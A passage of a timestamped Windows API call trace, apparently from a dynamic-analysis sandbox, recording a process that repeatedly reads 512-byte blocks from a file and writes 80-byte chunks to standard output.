[0119.463] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.463] GetFileType (hFile=0x4c) returned 0x1 [0119.463] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.463] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.464] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.464] GetFileType (hFile=0x4c) returned 0x1 [0119.465] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.465] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef168*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef168*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.465] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.465] GetFileType (hFile=0x4c) returned 0x1 [0119.465] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.465] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1b8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.465] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.465] GetFileType (hFile=0x4c) returned 0x1 [0119.465] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.465] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef208*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.465] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.465] GetFileType (hFile=0x4c) returned 0x1 [0119.465] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.465] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef258*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.465] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.465] GetFileType (hFile=0x4c) returned 0x1 [0119.465] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.465] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.465] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.465] GetFileType (hFile=0x4c) returned 0x1 [0119.465] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.465] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2f8*, lpNumberOfBytesWritten=0x1ee2fc*=0x20, lpOverlapped=0x0) returned 1 [0119.465] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.465] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.465] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.466] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x200, lpOverlapped=0x0) returned 1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.466] GetFileType (hFile=0x4c) returned 0x1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.466] GetFileType (hFile=0x4c) returned 0x1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.466] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.466] GetFileType (hFile=0x4c) returned 0x1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.466] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef168*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef168*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.466] GetFileType (hFile=0x4c) returned 0x1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.466] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1b8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.466] GetFileType (hFile=0x4c) returned 0x1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.466] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef208*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.466] GetFileType (hFile=0x4c) returned 0x1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.466] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef258*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.467] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.467] GetFileType (hFile=0x4c) returned 0x1 [0119.467] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.467] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.467] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.467] GetFileType (hFile=0x4c) returned 0x1 [0119.467] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.467] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2f8*, lpNumberOfBytesWritten=0x1ee2fc*=0x20, lpOverlapped=0x0) returned 1 [0119.467] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.467] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.467] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.467] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x200, lpOverlapped=0x0) returned 1 [0119.467] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.467] GetFileType (hFile=0x4c) returned 0x1 [0119.467] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.467] GetFileType (hFile=0x4c) returned 0x1 [0119.467] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.467] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.467] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.467] GetFileType (hFile=0x4c) returned 0x1 [0119.467] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.467] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef168*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef168*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] GetFileType (hFile=0x4c) returned 0x1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1b8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] GetFileType (hFile=0x4c) returned 0x1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef208*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] GetFileType (hFile=0x4c) returned 0x1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef258*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] GetFileType (hFile=0x4c) returned 0x1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] GetFileType (hFile=0x4c) returned 0x1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2f8*, lpNumberOfBytesWritten=0x1ee2fc*=0x20, lpOverlapped=0x0) returned 1 [0119.468] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.468] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.468] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.468] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x200, lpOverlapped=0x0) returned 1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] GetFileType (hFile=0x4c) returned 0x1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] GetFileType (hFile=0x4c) returned 0x1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] GetFileType (hFile=0x4c) returned 0x1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef168*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef168*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] GetFileType (hFile=0x4c) returned 0x1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1b8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] GetFileType (hFile=0x4c) returned 0x1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef208*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] GetFileType (hFile=0x4c) returned 0x1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef258*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] GetFileType (hFile=0x4c) returned 0x1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] GetFileType (hFile=0x4c) returned 0x1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2f8*, lpNumberOfBytesWritten=0x1ee2fc*=0x20, lpOverlapped=0x0) returned 1 [0119.469] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.469] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.469] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.470] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x200, lpOverlapped=0x0) returned 1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] GetFileType (hFile=0x4c) returned 0x1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] GetFileType (hFile=0x4c) returned 0x1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] GetFileType (hFile=0x4c) returned 0x1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef168*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef168*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] GetFileType (hFile=0x4c) returned 0x1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1b8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] GetFileType (hFile=0x4c) returned 0x1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef208*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] GetFileType (hFile=0x4c) returned 0x1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef258*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] GetFileType (hFile=0x4c) returned 0x1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] GetFileType (hFile=0x4c) returned 0x1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2f8*, lpNumberOfBytesWritten=0x1ee2fc*=0x20, lpOverlapped=0x0) returned 1 [0119.471] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.471] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.471] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.471] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x200, lpOverlapped=0x0) returned 1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] GetFileType (hFile=0x4c) returned 0x1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] GetFileType (hFile=0x4c) returned 0x1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] GetFileType (hFile=0x4c) returned 0x1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef168*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef168*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] GetFileType (hFile=0x4c) returned 0x1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1b8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] GetFileType (hFile=0x4c) returned 0x1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef208*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] GetFileType (hFile=0x4c) returned 0x1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef258*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] GetFileType (hFile=0x4c) returned 0x1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] GetFileType (hFile=0x4c) returned 0x1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2f8*, lpNumberOfBytesWritten=0x1ee2fc*=0x20, lpOverlapped=0x0) returned 1 [0119.472] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.472] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.472] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.472] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x200, lpOverlapped=0x0) returned 1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] GetFileType (hFile=0x4c) returned 0x1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] GetFileType (hFile=0x4c) returned 0x1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] GetFileType (hFile=0x4c) returned 0x1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef168*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef168*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] GetFileType (hFile=0x4c) returned 0x1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1b8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] GetFileType (hFile=0x4c) returned 0x1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef208*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] GetFileType (hFile=0x4c) returned 0x1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef258*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] GetFileType (hFile=0x4c) returned 0x1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] GetFileType (hFile=0x4c) returned 0x1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2f8*, lpNumberOfBytesWritten=0x1ee2fc*=0x20, lpOverlapped=0x0) returned 1 [0119.473] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.473] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.473] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.473] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x200, lpOverlapped=0x0) returned 1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] GetFileType (hFile=0x4c) returned 0x1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] GetFileType (hFile=0x4c) returned 0x1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] GetFileType (hFile=0x4c) returned 0x1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef168*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef168*, 